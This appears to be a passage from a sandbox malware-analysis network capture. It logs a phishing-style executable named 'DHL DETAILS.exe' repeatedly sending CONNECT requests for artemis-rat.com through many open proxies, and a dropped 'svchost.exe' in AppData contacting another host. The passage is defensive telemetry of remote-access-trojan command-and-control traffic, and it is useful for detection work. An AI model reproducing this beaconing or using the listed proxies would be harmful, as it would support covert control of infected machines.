Mar 9, 2024 13:14:13.320249081 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
302	192.168.2.5	50878	184.178.172.14	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.321254015 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
303	192.168.2.5	50748	222.220.102.159	8000	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.322542906 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.709717989 CET	705	IN	HTTP/1.1 502 Bad Gateway Server: openresty Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 556 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
304	192.168.2.5	51047	104.18.254.76	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.323355913 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.477770090 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
305	192.168.2.5	50747	114.79.148.218	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.331516027 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:14.129949093 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:15.317523003 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:17.724349976 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:22.536446095 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:27.286298037 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:32.146239996 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
306	192.168.2.5	51077	104.21.85.109	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.337836027 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.492299080 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
307	192.168.2.5	50908	132.226.7.23	30277	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.340614080 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
308	192.168.2.5	51085	104.23.141.196	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.340718985 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.494832993 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
309	192.168.2.5	51048	159.89.138.130	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.342535019 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.513547897 CET	343	IN	HTTP/1.1 400 Bad Request Server: nginx/1.10.3 (Ubuntu) Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 182 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 30 2e 33 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.10.3 (Ubuntu)</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
310	192.168.2.5	51056	47.88.3.19	8080	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.343576908 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:16.084095955 CET	309	IN	HTTP/1.1 400 Bad Request Server: nginx/1.23.4 Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 33 2e 34 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.23.4</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
311	192.168.2.5	50913	174.64.199.82	4145	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.344973087 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
312	192.168.2.5	51097	104.19.138.4	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.347516060 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.502717018 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
313	192.168.2.5	50827	193.239.56.84	8081	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.349531889 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
314	192.168.2.5	50868	18.135.133.116	3128	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.349657059 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.640599012 CET	116	IN	HTTP/1.1 200 OK Date: Sat, 09 Mar 2024 12:14:13 GMT Server: nginx Content-Type: text/plain Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
315	192.168.2.5	51105	104.16.107.206	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.351048946 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.505291939 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
316	192.168.2.5	51012	23.152.40.15	5050	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.354043961 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
317	192.168.2.5	50714	94.131.60.206	58378	43312	C:\Users\user\AppData\Roaming\svchost.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.359410048 CET	1260	IN	HTTP/1.1 403 Forbidden Server: squid/6.0.0-20220501-re899e0c27 Mime-Version: 1.0 Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html;charset=utf-8 Content-Length: 3670 X-Squid-Error: ERR_ACCESS_DENIED 0 Vary: Accept-Language Content-Language: en Cache-Status: ezproxies.com Via: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27) Connection: keep-alive Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e 61 2c 20 73 61 6e 73 2d 73 65 72 69 Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2022 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERROR: The requested URL could not be retrieved</title><style type="text/css">... /* * Copyright (C) 1996-2022 The Squid Software Foundation and contributors * * Squid software is distributed under GPLv2+ license and includes * contributions from numerous individuals and organizations. * Please see the COPYING and CONTRIBUTORS files for details. // Stylesheet for Squid Error pages Adapted from design by Free CSS Templates http://www.freecsstemplates.org Released for free under a Creative Commons Attribution 2.5 License// Page basics / {font-family: verdana, sans-seri

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
318	192.168.2.5	51100	162.159.242.230	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.360425949 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
Mar 9, 2024 13:14:13.521471024 CET	316	IN	HTTP/1.1 400 Bad Request Server: cloudflare Date: Sat, 09 Mar 2024 12:14:13 GMT Content-Type: text/html Content-Length: 155 Connection: close CF-RAY: - Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
319	192.168.2.5	50863	194.163.137.106	9050	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.362438917 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
320	192.168.2.5	50877	34.81.72.31	80	6352	C:\Users\user\Desktop\DHL DETAILS.exe

Timestamp	Bytes transferred	Direction	Data
Mar 9, 2024 13:14:13.365977049 CET	223	OUT	CONNECT artemis-rat.com:443 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3 Host: artemis-rat.com Proxy-Connection: Keep-Alive
